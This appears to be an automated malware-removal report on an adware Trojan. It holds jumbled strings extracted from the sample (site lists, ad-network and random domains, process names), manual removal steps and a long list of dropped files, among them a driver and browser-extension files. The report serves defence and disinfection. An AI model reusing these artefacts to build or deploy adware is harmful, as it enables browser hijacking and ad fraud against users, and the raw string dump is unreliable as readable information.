.alfavita.grakhbarona.comagnocafe.com.bragariogame.clubagarabi.comaek365.comadslzone.netabw.byabplive.inabout.com9tv.co.il9docu.com90min.com

.ztracker.orgzombs.iozmovs.comzlx.com.brzing.vnzi-m.infozamzar.comz-shadow.coyourdictionary.comyoum7.comynet.co.ilyeadesktopbr.comyeadesktop.comyapo.cl

.yallakora.comyad2.co.ily8.comxtraaa.comxenoversemods.comxe.grVVV.utopya.onlineVVV.telegraf.rsVVV.blic.rswormax.ioworldoftruckstr.comwordreference.com

.wordpress.comwordgames.comwoman.ruwikia.comwebmd.comweb.idway2sms.comwaplog.comwallpaperscraft.comvseigru.netvonvon.mevivud.comvivalocal.comvetogate.com

.vesti.bgvendobara.comvecernji.hruzone.iduukanshu.netuptodown.comuploadfiles.euupdatestar.comup-4ever.comukr.netufreegames.comuc123.com

.uai.com.brtwoo.comtv-alnoor.comtutorialspoint.comtut.byturkcealtyazi.orgtureng.comttt4.comtrueactivist.comtrud.comtribunnews.comtransfermarkt.com.tr

.transfermarkt.comtportal.hrtopigri.bgtomshardware.comtomshardware.co.uktitlovi.comtime-to-read.ruthewindowsclub.comthesimsresource.comthepurselover.com

.thepicta.comthefreedictionary.comthanhnien.vnthaiware.comth3professional.comteemo.ggtechtudo.com.brtechnopat.netteamliquid.nettamindir.comtaimienphi.vn

.tagged.comt24.com.trsymbolab.comsuperdownloads.com.brstudopedia.rustudfiles.rustiripesurse.rostatsroyale.comstarhit.rustardoll.comss.lvsprashivalka.com

.sporx.comsportpeaks.comsportingnews9.comsport.plsport.essport-fm.grspinz.iospeedtest.netsozcu.com.trsorubak.comsondakika.comsoftpedia.comsoftonic.com

.soccerway.comslobodnadalmacija.hrskai.grsimulatorgamemods.comsimolesr.comsiamsport.co.thshink.insfgate.comsearpages.comseargoo.comsdna.grscoalarutiera.ro

.sarkariresult.comsammobile.comsamequizy.plsabah.com.trruten.com.twrussianfood.comrussian7.ruruliweb.comru-m.orgrst.uaroblox.comriovagas.com.br

.ricardoeletro.com.brria.comreverso.netremontka.prorecord.ptrealitatea.netrbc.rur7.comquizzstar.comquikr.comqtipr.comqatarliving.computhiyathalaimurai.com

.pure-t.rupt.bigtests.clubprotothema.grpronews.grprobuilds.netprnt.scprice.com.hkposta.com.trpontofrio.com.brpoki.compointemout.compizap.com

.pesmaster.compciconcursos.com.brpasted.coparaloscuriosos.comparaguay.companzoid.comozee.comoyunskor.comoyunkolu.comouterspace.com.brouedkniss.com

.otzovik.comosuskinner.comonlinesoccermanager.comonliner.byonet.ploneindia.comolx.uaolx.roolx.ptolx.plolx.com.pkolx.com.egolx.com.brolx.co.idolx.ba

.okezone.comojogos.com.broitestes.comnovaskin.menosalty.hunk.plnjuskalo.hrnfscars.netnexusmods.comnextdeal.grnewssci.comnewsnow.co.uknews24.com

.news18.comnetshoes.com.brnet-empregos.comneedrom.comnaukri.comnametests.comnamemc.commynet.commyjoyonline.commydiv.netmyclosettoyours.commusica.com

.mundodeportivo.commundo.commultoigri.rumudah.mymsn.commope.iomoneycontrol.commojekrpice.hrmodxvm.commods-fs.netmodland.netmoddb.commobile01.commobile.bg

.mob.orgminutouno.comminhavida.com.brminhaconexao.com.brminecraftskins.comminecraftsix.comminecraftmaps.comminecraftforum.netminecraftforge.netminecrafteo.com

.minecraft-mp.comminecraft-inside.rumilliyet.com.trmeutimao.com.brmetropolitanafm.com.brmetrolyrics.commemurlar.netmemoryhackers.netmediafire.com

.mcskinsearch.commcleaks.netmaxthon.commathrubhumi.commasr140.commarvelousga.commarocannonces.commarca.commanualslib.commanoramaonline.commangadeep.com

.makeuseof.commakeleio.grmail.bgmagazineluiza.com.brmackolik.comls2013.comlove.huloudgames.comlottosociety.comlolskill.netlolnexus.comlolcounter.com

.listenonrepeat.comliputan6.comlinkmyc.comlikenation.comlifedaily.comliberal.grletour.frleboncoin.frleagueskin.netlcpdfr.comlavanguardia.comlatercera.com

.larousse.frlacuarta.comkwejk.plkupujemprodajem.comkraloyun.comkraljevstva.comkooora.comkongregate.comkomputerswiat.plkompas.comkizlarsoruyor.comkizi.com

.kaskus.co.idkaidee.comjutarnji.hrjuegos.comjoystamps.comjoygame.comjogos360.com.brjofogas.hujeuxjeuxjeux.frjeux.frjbzdy.pljavatpoint.comjatek-online.hu

.jaidefinichon.comjagran.comistitlaa.meirr.ruirctc.co.iniol.ptinvestopedia.comintoday.ininternethaber.cominteria.plinstructables.cominquirer.net

.infomoney.com.brinfojobs.com.brinfobae.comindiatimes.comindianexpress.comindia.comindex.hrimgrum.orgign.comigli5.comig.com.brieltsmaterial.com

.i3investor.comhurriyet.com.trhihi2.comhibapress.comhi5.comhespress.comherozerogame.comhearthpwn.comhealthbeautytipss.comhdwallpapers.inhdnicewallpapers.com

.hasznaltauto.huhardverapro.huhamariweb.comhackerexperience.comhaberturk.comhaberler.comhaber7.comgyakorikerdesek.hugw2efficiency.comguru3d.comgtainside.com

.gtaall.comgsurl.ingsp.rogsmhosting.comgsmarena.comgry.plgry-online.plgotoshop.net.uagomez-pictures.comgokano.comgoal.comgittigidiyor.comgismeteo.ru

.girlsgogames.rugirlsgogames.comghanamotion.comgezginler.netgen.trgem-flash.comgeeksforgeeks.orggazzetta.grgazetevatan.comgazeta.plgartic.com.brgamevui.vn

.gametop.comgamesgames.comgamesbarq.comgames.co.idgamersclub.com.brgamepressure.comgamepedia.comgameofglam.comgamemodding.netgamekit.comgamejolt.com

.gamefaqs.comgamebanana.comgame-game.com.uagame-debate.comgaana.comfutwatch.comfutbolarena.comfreestreet.gamesfreesteamkeys.comfreepik.esfreepik.com

.free-gg.comfotostrana.rufotor.comfotomac.com.trforum.hrflightradar24.comfishki.netfirmwarefile.comfilerio.infilehorse.comfilehippo.comfilchostgurru.com

.fb.rufastcup.netfanfiction.netfanatik.com.trezoworld.huextra.com.brexpress.co.ukexpatriates.comevz.roettoday.netets2.ltespncricinfo.comeobot.com

.ensonhaber.comennaharonline.comenikensky.comeluniversal.com.mxelmundo.eselitepvpers.comelektroda.pleleconomista.eselconfidencial.comel-nacional.comeenadu.net

.ebonus.ggebay.comebay.co.uke-onec.comdrive2.rudownload.com.vndonanimhaber.comdogry.pldocuments.tipsdobreprogramy.pldinamalar.comdigisport.rodiep.io

.detik.comdesafiomundial.comdella.bydcnews.rodailyentertainments.comcut-urls.comcurse.comcuanto-sabes.comcsfd.czcricbuzz.comcontextotucuman.com

.commentcamarche.netcoco01.netcnnturk.comcnet.comcmjornal.ptclubic.comclubedohardware.com.brclickjogos.com.brclangsm.comclaimwith.mechordtabs.in.th

.chess.comcharter97.orgchampion.ggcerpen.co.idcelibatairesduweb.comcatracalivre.com.brcatfly.com.brcatfly.comcasasbahia.com.brcaracol.com.cocar.gr

.capital.grcambridge.orgboredpanda.combongda.com.vnblogspot.mxblogspot.inblogspot.grblogspot.com.trblogspot.com.esblogspot.com.egblogspot.com.arblitz.bg

.bleepingcomputer.comblastingnews.combiobiochile.clbdjobs.combbc.combazos.czbaomoi.combandab.com.brbaixaki.com.brbadoo.combabycp.comavito.ruavaz.ba

.autovit.roauto.ruauction.bgaternos.orgarmorgames.comaristeguinoticias.comarchive3d.netarcai.comaqovd.comapkpure.comapkmirror.comapichoke.bizanswers.com

.androidfilehost.comamoryamistad.com.coamordoce.comambito.comalmaany.comallkpop.comall-free-download.comaksam.com.trakinator.comaglasem.comagar.ioagame.com

.adme.ruadevarul.roaddictinggames.comaccuweather.comacademia.eduabv.bgabril.com.brabola.ptabc.esa10.coma1.ro9minecraft.net9alami.info4j.com

.criteo.com

.g2a.com

.banggood.com

.souq.com

.jumia.io

.jumia.macicm

.jumia.com.egnggh

.jumia.co.ke

.alza.cz

.submarino.com.br

.netshoes.com.mx

.shoptime.com.br

.linio.com.mx

.pccomponentes.com

.kaspersky.com

.prozis.com

.snapdeal.com

.kanui.com.br

.daraz.com.bd

.malwarebytes.com

.alza.czhu

.bigpicturepoponclkdsexdynsrvtummiarunzpfadventurefeedscodeonclickadk2xcpxdelivemjcdcommission-junctionafcyhfvofzpwhycemlcualbrawxibrmrnsfpwlduhtrptqlkgawltovhc.com

.ftjcfxanrdoezrstkqlhcedpbolvwkqzyfjjdoqocyapmebfkdukvhpkracvdotomimplxtmsmjbpab.com

.onclickadsclick-cpapopadsqksrv.net

.adplex.media

.bestwebdeals.online

.admitad.com

.qatarairways.comadmitad.comarea51buy.com

.latamlantwoptripapycomm.com

.despegar.clco.crcom.arcom.cocom.eccom.mxcom.pecom.vecom.uycom.pacom.eccom

.knowbrid.com

.area51buy.comamericanas.com.br

.accorhotels.com

.travelmap.cf

.wildberries.ruwildberries.byarea51buy.comgrifanme.com

.ecomface.com

.xvideos.com

.trafficfactory.biz

.lovense.com

.bet365.com

.posthaus.com.br

.tomtop.com

.rosewholesale.com

.submarino.com.brarea51buy.com

.americanas.com.br

.despegar.

.click.linksynergy.com

.soicos.com

.lazada.co.idcom.mycom.phvnco.thsg

.amazon-adsystem.com

.media.net

.serving-sys.com

.propellerads.com

.mob.orgzlx.com.brzengaming.comzedo.comz-shadow.coyimg.comyeadesktopbr.comyeadesktop.comyapo.clyahoo.comyadi.skxtraaa.comxscores.comxe.gr

ekrn.exeKHClient.exeRelayClient.exeWebCacheClient.exe

svchost.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

combase.dll

mscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

2.exe

\*.cer

\trec.tmp

\x.tmp

\xtls.tmp

\xv.tmp

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

brastub6ab_amobl_inst.exe:3884
csc.exe:1780
csc.exe:1992
csc.exe:3712
setup.4.15.f.exe:2796
enjoyWIFI.exe:2704
cvtres.exe:2872
cvtres.exe:1692
cvtres.exe:948
adv_334.exe:3644
adv_334.exe:1504
schtasks.exe:1084
schtasks.exe:3636
schtasks.exe:3944
schtasks.exe:1720
Setup.exe:2448
Setup.exe:4028
starter.exe:3588
ytab_m_1_big.exe:3664
ytab_m_1_big.exe:2980
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\s4[1].ashx (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_del.bat (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe (54468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe (34372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\d44724a9212341309f18eefcfdd9b06c\setup.exe (407464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe (240166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (1444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\b6142ece028a474c9d04d9344fbbe359\ytab_m_1_big.exe (252126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\193351eab5ff42369b2ed8f5929eb197\Setup.exe (80632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe (218030 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (455 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (5572 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (3662 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (2490 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (652 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (4304 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
%Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (29506 bytes)
%Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
%Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
%Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (23 bytes)
%Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
%Program Files%\EnjoyWiFi\inst.db (5 bytes)
C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
%Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
%Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
%Program Files%\EnjoyWiFi\zlib.dll (925 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (3666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (3666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (3666 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon48.png (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (15861 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\computed_hashes.json (30 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\da\messages.json (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\no\messages.json (152 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\kn\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sk\messages.json (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (325 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_CN\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\gu\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon16.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sw\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sv\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ja\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\be\messages.json (204 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\verified_contents.json (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\foreground.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ml\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_TW\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\et\messages.json (127 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ru\messages.json (262 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\th\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\am\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\it\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (876 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es_419\messages.json (186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Content.js (2 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\te\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fi\messages.json (133 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sl\messages.json (138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\tr\messages.json (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon128.png (7 bytes)
